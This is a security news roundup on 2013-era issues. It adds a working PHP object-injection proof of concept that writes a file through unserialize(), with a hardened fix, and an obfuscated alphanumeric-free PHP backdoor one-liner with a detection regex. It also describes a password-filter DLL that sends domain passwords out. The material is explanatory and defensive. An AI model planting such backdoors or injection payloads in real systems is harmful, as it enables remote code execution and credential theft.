Security News #0x52
- Last week we discussed a Metasploit module for an Internet Explorer vulnerability; well, here is another. This one was patched in MS13-055, and the underlying flaw (CVE-2013-3163) is a use-after-free. The module targets only Internet Explorer 8 on Windows 7 (or XP).
- This is not so much an exploit as a description of an attack vector (no PoC code is available). Tom Van Goethem has a fantastic piece on how to exploit WordPress prior to 3.6.1. His idea is to abuse the PHP function unserialize(). As the PHP documentation notes, passing untrusted data to this function is, well, bad. As in remote code execution bad: a serialized string can name any class in the codebase and set its properties, and that object's magic methods (__wakeup(), __destruct() and friends) then run with attacker-chosen values. He picks out a few places in WordPress where the function is called and then finds a way to get user-supplied data to it. A great piece, and a great write-up. If you want a broader rather than a technical perspective, take a look at the Threatpost piece.
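To make the unserialize() point concrete, here is an added illustration of PHP object injection. It is not WordPress code and not from Tom Van Goethem's write-up; the class, the cookie value and the temp-file path are hypothetical. It shows a harmless-looking class whose destructor has a side effect, the vulnerable call that lets a cookie instantiate it, and the hardened call that refuses to instantiate any class.

```php
<?php
// Added illustration of PHP object injection; this is not WordPress code and
// not from Tom Van Goethem's write-up. The class, the cookie and the file
// path are all hypothetical.

// A "gadget": an ordinary class whose destructor has a side effect.
// Real applications contain many of these; the attacker only needs one.
class TemplateCache
{
    public $path = null;
    public $contents = '';

    public function __destruct()
    {
        // Runs when the object is freed, whether it was built by `new` or
        // by unserialize(). The attacker controls both properties.
        if ($this->path !== null) {
            file_put_contents($this->path, $this->contents);
        }
    }
}

// Vulnerable: any class in the codebase may be instantiated from the cookie,
// with attacker-chosen property values.
function load_prefs_vulnerable(string $cookie): array
{
    $prefs = unserialize($cookie);
    return is_array($prefs) ? $prefs : [];
}

// Hardened: refuse to instantiate objects at all (PHP >= 7.0). A class that
// appears in the data becomes __PHP_Incomplete_Class, whose destruction runs
// no application code. Then validate the shape you actually expect.
function load_prefs_safe(string $cookie): array
{
    $prefs = @unserialize($cookie, ['allowed_classes' => false]);
    return is_array($prefs) ? $prefs : [];
}

// Build the malicious cookie with serialize() so the length prefixes are right.
$target = sys_get_temp_dir() . '/object_injection_demo.php';
$gadget = new TemplateCache();
$gadget->path = $target;
$gadget->contents = "<?php echo 'written by a deserialized object'; ?>\n";
$payload = serialize($gadget);
$gadget->path = null;      // disarm the local copy so only the deserialized one fires
unset($gadget);

echo $payload, "\n";

@unlink($target);
load_prefs_vulnerable($payload);
echo 'vulnerable path wrote the file: ', var_export(file_exists($target), true), "\n";

@unlink($target);
load_prefs_safe($payload);
echo 'hardened path wrote the file: ', var_export(file_exists($target), true), "\n";
```

Two caveats. The `allowed_classes` option only exists from PHP 7.0, which postdates the WordPress releases in the story; in the PHP 5 era the only real fix was not to call unserialize() on anything a user could influence. And even with classes disabled, a format like JSON (json_decode()) is the better choice for data that crosses a trust boundary, since it never carried the ability to instantiate objects in the first place.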
- Mac OS X has been showing up here lately, for all the wrong reasons. This week we draw your attention to a post by MagerValp, who discovered back in May that logging in to OS X 10.7 through 10.8.4 can result in the clear-text password being exposed to other logged-in users.
- Carnal0wnage describes how he used a custom Windows password filter at the National CCDC to send credentials back to the attacker whenever they were changed on the domain controller. Password filters are DLLs that LSA loads and hands every new plaintext password to for policy checking, so one that phones home sees every password change in the domain; the matching defensive check is to audit the Notification Packages value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa on your domain controllers and verify every DLL listed there.
- Did you realize that you can write a PHP Backdoor without using any alphanumeric characters?
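The trick behind that question, as an added illustration rather than code from the linked post: PHP XORs strings byte by byte, so punctuation alone can manufacture the letters a backdoor needs. The block below shows the decoding, keeps the resulting one-liner as a string rather than executing it, and adds a hypothetical scanning heuristic (function name and sample files are constructed for this example).

```php
<?php
// Added illustration (not from the linked post) of how a PHP backdoor avoids
// letters and digits, and a heuristic for spotting one. The function name and
// the sample files are hypothetical.

// Bitwise XOR of two equal-length strings works byte by byte, so punctuation
// can manufacture any letter:
//   '`' (0x60) ^ '?' (0x3F) = 0x5F '_'
//   '{' (0x7B) ^ '<' (0x3C) = 0x47 'G'
//   '{' (0x7B) ^ '>' (0x3E) = 0x45 'E'
//   '{' (0x7B) ^ '/' (0x2F) = 0x54 'T'
$_ = "`{{{" ^ "?<>/";   // $_ now holds "_GET"
echo $_, "\n";

// ${$_} is a variable-variable, i.e. $_GET, so the following one-liner,
// requested as ?_=system&__=id, evaluates to system("id"). Kept as a
// string here so nothing is executed:
$backdoor = '<?php $_="`{{{"^"?<>/";${$_}["_"](${$_}["__"]);';

// The same tricks are what a scanner can key on: a string XOR'd with a
// string, variable-variables built from an underscore-only name, and a
// call made through a "_" / "__" index.
function looks_like_obfuscated_php(string $src): bool
{
    $patterns = [
        '/"[^"]*"\s*\^\s*"[^"]*"/',      // "..." ^ "..."
        '/\$\{\$_+\}/',                 // ${$_}, ${$__}, ...
        '/\[\s*"_+"\s*\]\s*\(/',        // ["_"](  call through an underscore key
    ];
    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $src) === 1) {
            return true;
        }
    }
    return false;
}

$benign = '<?php echo "hello"; ?>';
var_dump(looks_like_obfuscated_php($backdoor));
var_dump(looks_like_obfuscated_php($benign));
```

The heuristic is deliberately narrow; real obfuscators also lean on bitwise NOT, increment of a string (`$_++` walks through the alphabet) and `chr()`-free arithmetic, so treat it as one signature among several rather than a complete detector.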
- Graham Sutherland has a nice piece showing that the Dropbox client ships without ASLR enabled. That matters because a module loaded at a fixed, predictable base address hands an attacker with a memory-corruption bug a stable set of gadget addresses, which makes building a ROP chain much easier.
- While we are on Dropbox, there was a nice pair of pieces on how and why Dropbox apparently opens and scans certain file types that are uploaded to its service. The takeaway from the second piece is that this is done to render previews so the files can be viewed in a web browser.
- Vodafone Germany appears to have suffered a breach of personal details, including bank account information, for some two million customers.
- Ars Technica reports that NIST is recommending against the use of a previously published standard, the Dual_EC_DRBG random number generator in SP 800-90A, due to security concerns, possibly related to the latest NSA revelations.
- Here is Matthew Green's post on the NSA that Johns Hopkins asked him to take down. If you don't know the story, check out the discussion in Ars Technica.